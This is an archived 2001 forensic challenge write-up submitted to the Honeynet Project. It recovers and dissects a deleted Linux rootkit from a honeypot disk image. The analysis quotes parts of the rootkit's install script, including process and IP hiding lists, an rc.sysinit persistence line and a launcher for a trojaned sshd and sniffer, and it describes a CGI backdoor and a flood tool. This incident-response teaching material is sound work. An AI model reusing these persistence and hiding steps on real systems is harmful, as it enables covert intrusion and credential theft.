From marlonsj@yahoo.com.br Tue May 22 22:41:11 2001 Date: Tue, 22 May 2001 12:02:13 -0300 (ART) From: Marlon Jabbur To: project@honeynet.org Subject: #15 Scan of the Month Hi, First I would like to congratulate all of you for such a exciting challenge. And here it goes my submission.. TIA Marlon Jabbur _______________________________________________________________________________________________ Yahoo! GeoCities Tenha seu lugar na Web. Construa hoje mesmo sua home page no Yahoo! GeoCites. É fácil e grátis! http://br.geocities.yahoo.com/ [ Part 2: "analysis.txt" ] Introduction This report attempts to answer the challenge proposed by the Honeynet Project - http://project.honeynet.org #15 Scan of the Month, more information about this challenge can be found in: * http://project.honeynet.org/scans/ * http://project.honeynet.org/scans/scan15/ The following tools were used to perform this analysis: * The Coroner Toolkit - http://www.porcupine.org/forensics/tct.html * Debian GNU/Linux - http://www.debian.org For installation instructions of the software used in this analysis please refer to the INSTALL file contained in the TCT distribution and for Debian GNU/Linux installation please refer to the document "Installing Debian GNU/Linux 2.2 for Intel x86" which can be found at http://www.debian.org/releases/2.2/i386/install. 1. Show step by step how you identify and recover the deleted rootkit from the / partition. To start this work I've setup setup a workspace in the analysis system and downloaded the file from the Honeynet web site. After that I've verified the integrity of the copied file to assure that wasn't corrupted during the transfer. The following commands were issued: ====================================================================== uakti:~# mkdir -p /data/a/m uakti:~# mkdir /data/a/original uakti:~# cd /data/a/original uakti:/data/a/original# wget -q http://project.honeynet.org/scans/scan15/honeynet.tar.gz uakti:/data/a/original# gzip -dc honeynet.tar.gz | tar xf - uakti:/data/a/original# ls honeynet honeynet.tar.gz uakti:/data/a/original# md5sum honeynet/honeypot.hda8.dd honeynet.tar.gz 5a8ebf5725b15e563c825be85f2f852e honeynet/honeypot.hda8.dd 0dff8fb9fe022ea80d8f1a4e4ae33e21 honeynet.tar.gz ====================================================================== The bit-image copy was then processed using the igrabber.pl (which can be found in the Appendix A) to grab the inodes from removed files of the system and generate a file containing the type of the inodes grabbed. ====================================================================== uakti:/data/a# ./igrabber.pl -i honeynet/original/honeynet/honeypot.hda8.dd -o inodes.txt /usr/local/tct/bin/icat: read (512@1807052486656): Success /usr/local/tct/bin/icat: read (512@1807052486656): Success /usr/local/tct/bin/icat: read (512@1807052486656): Success uakti:/data/a# ====================================================================== Examination of the file "inodes.txt", generated by the -o flag of the igrabber.pl script, shows that the recovered file inode.23 is a gzip file, after decompressing this file we found that it contains what it looks like a rootkit. ====================================================================== Script started on Sat May 19 19:44:43 2001 uakti:/data/a# cd inodes uakti:/data/a/inodes# ls inode.16110 inode.2043 inode.2048 inode.2053 inode.2061 inode.56231 inode.2039 inode.2044 inode.2049 inode.2054 inode.23 inode.8100 inode.2040 inode.2045 inode.2050 inode.2058 inode.30188 inodes.txt inode.2041 inode.2046 inode.2051 inode.2059 inode.30191 inode.2042 inode.2047 inode.2052 inode.2060 inode.48284 uakti:/data/a/inodes# cat inodes.txt inode.16110: ASCII text inode.2039: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped inode.2040: PCX image data, version 2.5 inode.2041: Bourne shell script text inode.2042: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped inode.2043: Bourne-Again shell script text inode.2044: English text inode.2045: Bourne shell script text inode.2046: English text inode.2047: perl script text inode.2048: English text inode.2049: data inode.2050: ASCII text inode.2051: data inode.2052: ASCII text inode.2053: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped inode.2054: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped inode.2058: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped inode.2059: ASCII text inode.2060: ASCII text inode.2061: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped inode.23: gzip compressed data, deflated, last modified: Sat Mar 3 00:09:06 2001, os: Unix inode.30188: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped inode.30191: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped inode.48284: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped inode.56231: ASCII text inode.8100: English text inodes.md5: ASCII text inodes.md5s: ASCII text inodes.md5s~: ASCII text uakti:/data/a/inodes# tar zxvf inode.23 last/ tar: Archive contains future timestamp 2002-02-08 11:08:13 last/ssh last/pidfile last/install last/linsniffer last/cleaner last/inetd.conf last/lsattr last/services last/sense last/ssh_config last/ssh_host_key last/ssh_host_key.pub last/ssh_random_seed last/sshd_config last/sl2 last/last.cgi last/ps last/netstat last/ifconfig last/top last/logclear last/s last/mkxfs uakti:/data/a/inodes# ====================================================================== After a close examination of the files extracted we've found that this is really a rootkit that substitutes the system's binaries, creates a backdoor for the intruder and warns the intruder about the new system that was rooted. It is interesting to note that doing a md5sum of the files contained in the inode.23 file and comparing with the inodes recovered we have found that most of the inodes recovered corresponds to the rootkit files and the older system binaries replaced by the rootkit. This is shown below: ====================================================================== 06d04fa3c4941b398756d029de75770e inode.2060 last/s 115f438631de8d0a7c03c9d458eb7257 inode.23 lk.tgz - The rootkit 12e8748c19abe7a44e67196c22738e9b inode.2043 last/cleaner 18a2d7d3178f321b881e7c493af72996 inode.2061 last/mkxfs 202a51b16ac8d1b4dc75de89e7344ed4 inode.2054 last/last.cgi 21ed3ca31a9c9b51a757f1644e26f2f7 inode.2039 last/ssh 312de877e5180678cd54606e1c25af40 inode.2052 last/sshd_config 464dc23cac477c43418eb8d3ef087065 inode.2047 last/sense 4cfae8c44a6d1ede669d41fc320c7325 inode.2053 last/sl2 54e41f035e026f439d4188759b210f07 inode.2046 last/services 5e1725f2734365fef9e55398785f3033 inode.30191 replaced /bin/ps 5f22ceb87631fbcbf32e59234feeaa5b inode.2059 last/logclear 5fd2ce512e0eba4d090191e8a1518808 inode.2048 last/ssh_config 68b329da9893e34099c7d8ad5cb9c940 inode.2040 last/pidfile 8ff0939cd49a0b2ef3156c7876afca4b inode.2058 last/top 964db5da8cf89810a54659b6fdb81958 inode.2041 last/install ad265d3c07dea3151bacb6930e0b72d3 inode.2051 last/ssh_random_seed b52af438845c776cde94f67e19cd037a inode.48284 replaced /sbin/ifconfig b63485e42035328c0d900a71ff2e6bd7 inode.2044 last/inetd.conf c2c1b08498ed71a908c581d634832672 inode.2049 last/ssh_host_key dfb2eeea2a5ba23eb6a2b9d0cff9d82f inode.2045 last/lsattr e76cd5baaab7b4f28c999946a9cb4dcc inode.2050 last/ssh_host_key.pub f174e862d00d0998c3fa4ccd632019b5 inode.30188 replaced /bin/netstat ====================================================================== 2. What files make up the deleted rootkit? In the analysis below we will be referring to the rootkit analyzed in the #13 Scan of the Month, in fact we're talking about the file xzibit.tar.gz which was installed by the auto-rooter. The rootkit installed in the compromised system is composed of the following files: last/cleaner - This is a log cleaner, it receives as argument the string that will be cleaned from the log files. last/ifconfig - This is a trojaned version that hides the promiscuous state of an interface. last/inetd.conf - This is a configuration file for the inetd super daemon, it enables the normal telnet daemon and a pop-3 daemon pointing to the file /usr/cyrus/bin/pop3d which normally does not exist on RedHat Systems and it wasn't installed with this rootkit. Also it disables the default services started by a RedHat 6.2 system. last/install - This is the script used to install the rootkit, the following actions are done by this file: 1. It replaces the system's binaries ifconfig, ps, top and netstat. 2. Creates the configuration files /dev/rpm and /dev/last which will be used to hide the connections and processes used by the intruder. Related to this action it's important to note that although this looks like the original intention of the intruder, the files netstat, top and ps does not have any references to these configuration files (they point to /dev/dsx and /dev/caca). 3. It creates two hidden directories /dev/ida/.drag-on and /dev/ida/".. " and copies the utilities used by the intruder (ssh, linsniffer, sense and configuration files) to these directories. 4. Replaces the inetd.conf and services systems files in /etc and alters the system file /etc/rc.d/rc.sysinit to execute the script /usr/bin/lsattr which is responsible to start the sniffer and the trojaned ssh daemon. 5. Searches the system for common cgi-bin directories and if found any it copies the file last.cgi to this directory. 6. Finally it grabs information of the system and send it to the following email addresses last@linuxmail.org and bidi_damm@hotmail.com and cleans itself. last/last.cgi - This is cgi script used by the intruder to execute arbitrary commands on the compromised machine, this file is the same becys.cgi analyzed in the #13 Scan of The Month. last/linsniffer - This is a common network sniffer that looks for password sent in clear in the network, it can be found in the lrk4 ( linux rootkit version 4). last/logclear - This shell script is used to clean the linsniffer logs. last/lsattr - This is the shell script used to start the sniffer and the sshd (ssh daemon) installed by the intruder, it is executed by the install script and the /etc/rc.d/rc.sysinit script. last/mkxfs - This is a trojaned ssh daemon used by the intruder to access the system. last/netstat, last/ps, last/ifconfig - These are trojaned version used to hide connections and processes of the intruder, as noted above these files does not make any reference to the configuration files created by the install script (/dev/rpm and /dev/last) strings found in these files show that they use the configuration files /dev/dsx and /dev/caca. Also these files are the same analyzed in the #13 Scan of the Month. last/s, last/sshd_config - These files are sshd configuration files, only the file last/s is used by the rootkit. last/sense - This is a perl script that sorts the output file generated by linsniffer last/services - This file is the services database with an alias entry for the ssh/udp service that contains an alias to /usr/sbin/sshd, I could not find a reference to this in any of the programs packaged in the rootkit. last/sl2 - This is a DoS tool which SynFloods the target, it is the same analyzed in the #13 Scan of the Month. last/ssh, last/ssh_config - This is the client side of the ssh suite and the configuration file used to it. last/ssh_host_key, last/ssh_host_key.pub, last/ssh_random_seed - These are files used by the sshd to store keys and seeds used in cryptography. 3. Was the rootkit ever actually installed on the system? How do you know? Yes, The rootkit was installed on the system. This can be verified by looking at the files installed by the install script, one of the first actions taken by this script is the substitutions of the system's files ps, netstat, top and ifconfig if we verify the md5 hash of the installed files and compare with the files contained in the recovered package we will check this. ====================================================================== uakti:/data/a/inodes# cd last uakti:/data/a/inodes/last# mount -o loop,ro,nodev,noexec /data/a/original/honeynet/honeypot.hda8.dd /data/a/m uakti:/data/a/inodes/last# md5sum ps /data/a/m/bin/ps 7728c15d89f27e376950f96a7510bf0f ps 7728c15d89f27e376950f96a7510bf0f /data/a/m/bin/ps uakti:/data/a/inodes/last# md5sum netstat /data/a/m/bin/netstat 2b07576213c1c8b942451459b3dc4903 netstat 2b07576213c1c8b942451459b3dc4903 /data/a/m/bin/netstat uakti:/data/a/inodes/last# md5sum ifconfig /data/a/m/sbin/ifconfig 086394958255553f6f38684dad97869e ifconfig 086394958255553f6f38684dad97869e /data/a/m/sbin/ifconfig uakti:/data/a/inodes/last# ====================================================================== After replacing the system's files the install script creates two configuration files /dev/rpm and /dev/last we can find these files in the /dev directory. ====================================================================== uakti:/data/a/inodes/last# cat install ..... echo "* Gata..." echo -n "* Dev... " echo echo touch /dev/rpm >/dev/rpm echo "3 sl2" >>/dev/rpm echo "3 sshdu" >>/dev/rpm echo "3 linsniffer" >>/dev/rpm echo "3 smurf" >>/dev/rpm echo "3 slice" >>/dev/rpm echo "3 mech" >>/dev/rpm echo "3 muh" >>/dev/rpm echo "3 bnc" >>/dev/rpm echo "3 psybnc" >> /dev/rpm touch /dev/last >/dev/last echo "1 193.231.139" >>/dev/last echo "1 213.154.137" >>/dev/last echo "1 193.254.34" >>/dev/last echo "3 48744" >>/dev/last echo "3 3666" >>/dev/last echo "3 31221" >>/dev/last echo "3 22546" >>/dev/last echo "4 48744" >>/dev/last echo "4 2222" >>/dev/last echo "* Gata" .... uakti:/data/a/inodes/last# cat /data/a/m/dev/rpm 3 sl2 3 sshdu 3 linsniffer 3 smurf 3 slice 3 mech 3 muh 3 bnc 3 psybnc uakti:/data/a/inodes/last# cat /data/a/m/dev/last 1 193.231.139 1 213.154.137 1 193.254.34 3 48744 3 3666 3 31221 3 22546 4 48744 4 2222 uakti:/data/a/inodes/last# ====================================================================== After the creation of the configuration files, the install script creates two directories /dev/ida/.drag-on and /dev/ida/".. " and copies the files linsniffer, logclear, sense, sl2, mkxfs, s, ssh_host_key, ssh_random_seed to this directories, creates the files tcp.log and copies the inetd.conf configuration file and the services database to the /etc of the system, we will verify the presence of the files and the md5 hash of the inetd.conf and services database. ====================================================================== uakti:/data/a/inodes/last# ls -l /data/a/m/dev/ida/.drag-on/ total 647 -rwx------ 1 root root 7165 Mar 15 22:45 linsniffer -rwx------ 1 root root 75 Mar 15 22:45 logclear -rwxr-xr-x 1 root root 632066 Mar 15 22:45 mkxfs -rw-r--r-- 1 root root 708 Mar 15 22:45 s -rwxr-xr-x 1 root root 4060 Mar 15 22:45 sense -rwx------ 1 root root 8268 Mar 15 22:45 sl2 -rw------- 1 root root 540 Mar 15 22:45 ssh_host_key -rw------- 1 root root 512 Mar 16 11:45 ssh_random_seed -rw-r--r-- 1 root root 138 Mar 16 13:28 tcp.log uakti:/data/a/inodes/last# ls -l /data/a/m/dev/ida/".. " total 646 -rwx------ 1 root root 7165 Mar 15 22:45 linsniffer -rwx------ 1 root root 75 Mar 15 22:45 logclear -rwxr-xr-x 1 root root 632066 Mar 15 22:45 mkxfs -rw-r--r-- 1 root root 708 Mar 15 22:45 s -rwxr-xr-x 1 root root 4060 Mar 15 22:45 sense -rwx------ 1 root root 8268 Mar 15 22:45 sl2 -rw------- 1 root root 540 Mar 15 22:45 ssh_host_key -rw------- 1 root root 512 Mar 15 22:45 ssh_random_seed -rw-r--r-- 1 root root 0 Mar 15 22:45 tcp.log uakti:/data/a/inodes/last# md5sum inetd.conf /data/m/etc/inetd.conf b63485e42035328c0d900a71ff2e6bd7 inetd.conf b63485e42035328c0d900a71ff2e6bd7 /data/a/m/etc/inetd.conf uakti:/data/a/inodes/last# md5sum services /data/a/m/etc/services 54e41f035e026f439d4188759b210f07 services 54e41f035e026f439d4188759b210f07 /data/a/m/etc/services uakti:/data/a/inodes/last# ====================================================================== Later the install script appends a line to the file /etc/rc.d/rc.sysinit, this line executes a script that will start the sniffer and the ssh daemon installed by the rootkit, we can verify this line looking at the end of the file /etc/rc.d/rc.sysinit ====================================================================== uakti:/data/a/inodes/last# cat install ... echo echo "* Adaugam In Startup:) ..." rm -rf /usr/bin/lsattr echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit cp -f lsattr /usr/bin/ chmod 500 /usr/bin/lsattr chattr +i /usr/bin/lsattr /usr/bin/lsattr .... uakti:/data/a/inodes/last# tail /data/a/m/etc/rc.d/rc.sysinit ... /sbin/getkey i && touch /var/run/confirm fi wait /usr/bin/lsattr -t1 -X53 -p uakti:/data/a/inodes/last# cat lsattr #!/bin/sh cd /dev/ida/.drag-on ./mkxfs -f ./s ./linsniffer >> ./tcp.log & cd / uakti:/data/a/inodes/last# ====================================================================== Besides the "install" script to confirm the installation of the rootkit we will analyze the Modify/Access/Change timestamp of the filesystem looking for signs activity. We will use "ils" and "ils2mac" to collect the timestamp of the deleted inodes and will execute "grave-robber" to collect the timestamp of the living files, after this collection we will use "mactime" to generate a file that contains all activities in the system beginning from 03/15/2001. The following commands were used to accomplish this: ====================================================================== uakti:/data/a# mkdir gr uakti:/data/a# export PATH=$PATH:/usr/local/tct/bin uakti:/data/a# grave-robber -c m -m -d gr -o LINUX2 uakti:/data/a# ils original/honeynet/honeypot.hda8.dd | ils2mac > ils.body uakti:/data/a# mkdir mactimes uakti:/data/a# cat ils.body gr/body > mactimes/body.full uakti:/data/a# cd mactimes uakti:/data/a/mactimes# mactime -p /data/a/m/etc/passwd -g /data/a/m/etc/group -b body.full 03/15/2001 > mactimes.txt uakti:/data/a/mactimes# ====================================================================== Analyzing the timestamps generated we can see that the inode 23 (the rootkit) has the modification at March 15 22:36:48 what can mean that the intruder intruder was downloading the rootkit package to the compromised machine. After that at March 15 22:44:50 the intruder appears to unpack the rootkit package and at March 15 22:45:02 it executes the "install" script (inode 2041) we can note the access to the "chown" system utility, the copy of the rootkit files to the system. At March 15 22:45:03 we can see the modification of the file "/etc/rc.d/rc.sysinit". And finally at March 15 22:45:05 and 22:46:09 we can see the intruder accessing the files "/bin/mail", "/bin/df", "/etc/sendmail.cf" and "sendmail.cw" this corresponds to the last part of the "install" script which sends to the intruder information about the machine. Below we can see all this activity. ====================================================================== Mar 15 01 22:36:48 520333 m.. -rw-r--r-- root root Mar 15 01 22:44:50 611931 .a. -rwxr-xr-x root root 1 .a. -rw-r--r-- root root 1345 .a. -rwxr-xr-x root root 880 .a. -rw-r--r-- root root 344 .a. -rw-r--r-- root root 688 .a. -rw-r--r-- root root 520333 .a. -rw-r--r-- root root 35300 .a. -rwxr-xr-x root root m/bin/netstat 33280 .a. -rwxr-xr-x root root m/bin/ps Mar 15 01 22:45:02 4060 .a. -rwxr-xr-x root root 8268 .a. -rwx------ root root 53588 .ac -rwxr-xr-x root root 75 .a. -rwx------ root root 66736 ..c -rwxr-xr-x root root 60080 ..c -r-xr-xr-x root root 42736 ..c -rwxr-xr-x root root 2048 m.c drwxr-xr-x root root m/bin 11952 .a. -rwxr-xr-x root root m/bin/chown 35300 ..c -rwxr-xr-x root root m/bin/netstat 33280 ..c -rwxr-xr-x root root m/bin/ps 34816 m.c drwxr-xr-x root root m/dev 12288 m.c drwxrwxr-x root root m/dev/ida 7165 mac -rwx------ root root m/dev/ida/.. /linsniffer 75 mac -rwx------ root root m/dev/ida/.. /logclear 632066 .a. -rwxr-xr-x root root m/dev/ida/.. /mkxfs 4060 mac -rwxr-xr-x root root m/dev/ida/.. /sense 8268 mac -rwx------ root root m/dev/ida/.. /sl2 7165 m.c -rwx------ root root m/dev/ida/.drag-on/linsniffer 75 mac -rwx------ root root m/dev/ida/.drag-on/logclear 632066 m.c -rwxr-xr-x root root m/dev/ida/.drag-on/mkxfs 708 m.c -rw-r--r-- root root m/dev/ida/.drag-on/s 4060 mac -rwxr-xr-x root root m/dev/ida/.drag-on/sense 8268 mac -rwx------ root root m/dev/ida/.drag-on/sl2 540 m.c -rw------- root root m/dev/ida/.drag-on/ssh_host_key 87 mac -rw-r--r-- root root m/dev/last 71 mac -rw-r--r-- root root m/dev/rpm 3072 m.c drwxr-xr-x root root m/sbin 19840 ..c -rwxr-xr-x root root m/sbin/ifconfig Mar 15 01 22:45:03 3278 .a. -rw-r--r-- root root 79 .a. -rwxr-xr-x root root 11407 .a. -rw-r--r-- root root 4060 ..c -rwxr-xr-x root root 540 .ac -rw------- root root 512 .ac -rw------- root root 8268 ..c -rwx------ root root 75 ..c -rwx------ root root 708 .ac -rw-r--r-- root root 632066 .ac -rwxr-xr-x root root 33392 .a. -rwxr-xr-x root root m/bin/cp 5760 .a. -rwxr-xr-x root root m/bin/sleep 1024 m.c drwxr-xr-x root root m/dev/ida/.. 632066 m.c -rwxr-xr-x root root m/dev/ida/.. /mkxfs 708 mac -rw-r--r-- root root m/dev/ida/.. /s 540 mac -rw------- root root m/dev/ida/.. /ssh_host_key 512 mac -rw------- root root m/dev/ida/.. /ssh_random_seed 0 mac -rw-r--r-- root root m/dev/ida/.. /tcp.log 1024 m.c drwxr-xr-x root root m/dev/ida/.drag-on 7165 .a. -rwx------ root root m/dev/ida/.drag-on/linsniffer 632066 .a. -rwxr-xr-x root root m/dev/ida/.drag-on/mkxfs 708 .a. -rw-r--r-- root root m/dev/ida/.drag-on/s 540 .a. -rw------- root root m/dev/ida/.drag-on/ssh_host_key 512 .a. -rw------- root root m/dev/ida/.drag-on/ssh_random_seed 138 .a. -rw-r--r-- root root m/dev/ida/.drag-on/tcp.log 3072 m.c drwxr-xr-x root root m/etc 3278 mac -rw-r--r-- root root m/etc/inetd.conf 13708 m.c -rwxr-xr-x root root m/etc/rc.d/rc.sysinit 11407 m.c -rw-r--r-- root root m/etc/services 17 .a. lrwxrwxrwx root root m/lib/libcom_err.so.2 -> libcom_err.so.2.0 8465 .a. -rwxr-xr-x root root m/lib/libcom_err.so.2.0 13 .a. lrwxrwxrwx root root m/lib/libe2p.so.2 -> libe2p.so.2.3 17713 .a. -rwxr-xr-x root root m/lib/libe2p.so.2.3 16 .a. lrwxrwxrwx root root m/lib/libext2fs.so.2 -> libext2fs.so.2.4 85856 .a. -rwxr-xr-x root root m/lib/libext2fs.so.2.4 Mar 15 01 22:45:05 0 mac drwxr-xr-x 1031 users 611931 ..c -rwxr-xr-x root root 1 ..c -rw-r--r-- root root 3713 .ac -rwx------ root root 796 mac -rw-r--r-- root root 1345 ..c -rwxr-xr-x root root 3278 ..c -rw-r--r-- root root 79 ..c -rwxr-xr-x root root 11407 ..c -rw-r--r-- root root 880 ..c -rw-r--r-- root root 344 ..c -rw-r--r-- root root 688 ..c -rw-r--r-- root root 4620 .ac -rwxr-xr-x root root 520333 ..c -rw-r--r-- root root 24816 .a. -rwxr-xr-x root root m/bin/df 62384 .a. -rwxr-xr-x root mail m/bin/mail 51 .a. -rw-r--r-- root root m/etc/conf.modules 112 .a. -rw-r--r-- root root m/etc/mail.rc 17 .a. lrwxrwxrwx root root m/lib/ld-linux.so.1 -> ld-linux.so.1.9.5 25386 .a. -rwxr-xr-x root root m/lib/ld-linux.so.1.9.5 788401 .a. -rwxr-xr-x root root m/lib/libdb-2.1.3.so 14 .a. lrwxrwxrwx root root m/lib/libdb.so.3 -> libdb-2.1.3.so 44108 .a. -rwxr-xr-x root root m/lib/libproc.so.2.0.6 28633 .a. -rw-r--r-- root root m/lib/modules/2.2.14-5.0/modules.dep 19840 .a. -rwxr-xr-x root root m/sbin/ifconfig 6 .a. lrwxrwxrwx root root m/sbin/modprobe -> insmod Mar 15 01 22:46:09 34181 .a. -rw-r--r-- root root m/etc/sendmail.cf 59 .a. -rw-r--r-- root root m/etc/sendmail.cw ====================================================================== Appendix A. The igrabber.pl script This is a very simple script that was written to automate the process of listing the free inodes of an image (using ils), copy its contents (using icat) and determine its type (using file). To run this script you'll need perl and a working copy of TCT and to adjust the variables ICAT, ILS and FILE to the appropriate location on you system. The script accepts the following flags: -i image_file This is the only mandatory flag and requires the image file to be analyzed. -p prefix This flag specify the prefix of the inodes copied by icat. -o output_file By default igrabber.pl shows in stdout the type of the inodes copied, if this flag is present this output goes to the file specified. ######################################## #### Begin of igrabber.pl ######################################## #!/usr/bin/perl -w use strict; use Getopt::Std; my $ICAT = '/usr/local/tct/bin/icat'; my $ILS = '/usr/local/tct/bin/ils'; my $FILE = '/usr/local/tct/bin/file'; sub usage() { print "$0 -i image_file_name [-p prefix] [-o output_file]\n"; exit 1; } my %options; my $prefix; getopt('oip', \%options); $options{'i'} or usage(); $prefix = $options{'p'} || 'inode'; if ( $options{'o'} ) { open (STDOUT, ">$options{o}") or die ("Couldn't open file $options{o}: $!"); } open (INODES, "$ILS $options{i}|") or die ("Couldn't create pipe: $!"); while () { my ($inode) = split /\|/; next unless ( $inode =~ /^\d+/); system ("$ICAT $options{i} $inode > $prefix.$inode"); my $output = `$FILE $prefix.$inode`; print $output; } close(INODES); exit 0; ######################################## #### End of igrabber.pl ########################################